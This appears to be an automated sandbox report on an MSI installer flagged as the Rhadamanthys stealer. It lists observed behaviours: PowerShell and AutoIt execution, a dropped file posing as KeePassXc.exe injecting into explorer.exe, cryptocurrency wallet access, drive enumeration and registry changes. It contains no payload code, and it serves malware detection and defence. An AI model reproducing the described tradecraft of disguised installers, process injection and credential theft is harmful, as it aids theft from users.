Malware Analysis Report

2024-10-10 13:33

Sample ID 240601-1rpz6sfh61
Target setup.msi
SHA256 67ecba82950d8dfefe1b7c8564f959cdb35601dbc9a4b010bd929be7d1ae240c
Tags
execution spyware rhadamanthys stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

67ecba82950d8dfefe1b7c8564f959cdb35601dbc9a4b010bd929be7d1ae240c

Threat Level: Known bad

The file setup.msi was found to be: Known bad.

Malicious Activity Summary

execution spyware rhadamanthys stealer

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates connected drives

Suspicious use of SetThreadContext

Command and Scripting Interpreter: AutoIT

Loads dropped DLL

Executes dropped EXE

Drops file in Windows directory

Program crash

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 21:53

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 21:53

Reported

2024-06-01 22:12

Platform

win10v2004-20240426-en

Max time kernel

272s

Max time network

278s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Downloads MZ/PE file

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A

Command and Scripting Interpreter: AutoIT

execution
Description Indicator Process Target
N/A N/A \??\c:\st\Autoit3.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3492 set thread context of 1988 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\e5737c9.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3856.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3952.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5737c9.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4D99.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{BFB3A06C-96C7-42C4-A90F-78C892A36FF8} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5737cd.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI38F3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3972.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI39B1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3A2F.tmp C:\Windows\system32\msiexec.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 \??\c:\st\Autoit3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString \??\c:\st\Autoit3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\explorer.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-52#immutable1 = "Set the date, time, and time zone for your computer." C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\Vault.dll,-1#immutable1 = "Credential Manager" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Speech Recognition" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-2#immutable1 = "Configure how speech recognition works on your computer." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\netcenter.dll,-1#immutable1 = "Network and Sharing Center" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-2#immutable1 = "Customize settings for the display of languages, numbers, times, and dates." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-601#immutable1 = "Indexing Options" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "2" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\GroupByKey:PID = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-2#immutable1 = "Protect your PC using BitLocker Drive Encryption." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-102#immutable1 = "Keyboard" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\DeviceCenter.dll,-1000#immutable1 = "Devices and Printers" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-1#immutable1 = "Power Options" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-1#immutable1 = "Phone and Modem" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-51#immutable1 = "Date and Time" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 1e007180000000000000000000006abe817b2bce7646a29eeb907a5126c50000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-2#immutable1 = "Recovery" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-10#immutable1 = "Ease of Access Center" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-3#immutable1 = "Region" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-7#immutable1 = "Change advanced color management settings for displays, scanners, and printers." C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307} C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\Mode = "4" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12123#immutable1 = "Set firewall security options to help protect your computer from hackers and malicious software." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-602#immutable1 = "Change how Windows indexes to search faster" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-1#immutable1 = "BitLocker Drive Encryption" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f706806ee260aa0d7449371beb064c986830000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\DiagCpl.dll,-15#immutable1 = "Troubleshoot and fix common computer problems." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-300#immutable1 = "Sound" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\HotKey = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-52#immutable1 = "File History" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-101#immutable1 = "Recovery" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-301#immutable1 = "Configure your audio devices or change the sound scheme for your computer." C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\LogicalViewMode = "2" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-2#immutable1 = "Conserve energy or maximize performance by choosing how your computer manages power." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-1#immutable1 = "User Accounts" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\autoplay.dll,-1#immutable1 = "AutoPlay" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-6#immutable1 = "Color Management" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-45#immutable1 = "Make your computer easier to use." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\FFlags = "18874385" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\IconSize = "48" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\LogicalViewMode = "1" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\systemcpl.dll,-1#immutable1 = "System" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\IconSize = "16" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-2#immutable1 = "Change user account settings and passwords for people who share this computer." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-5#immutable1 = "View and update your device hardware settings and driver software." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sdcpl.dll,-101#immutable1 = "Backup and Restore (Windows 7)" C:\Windows\explorer.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
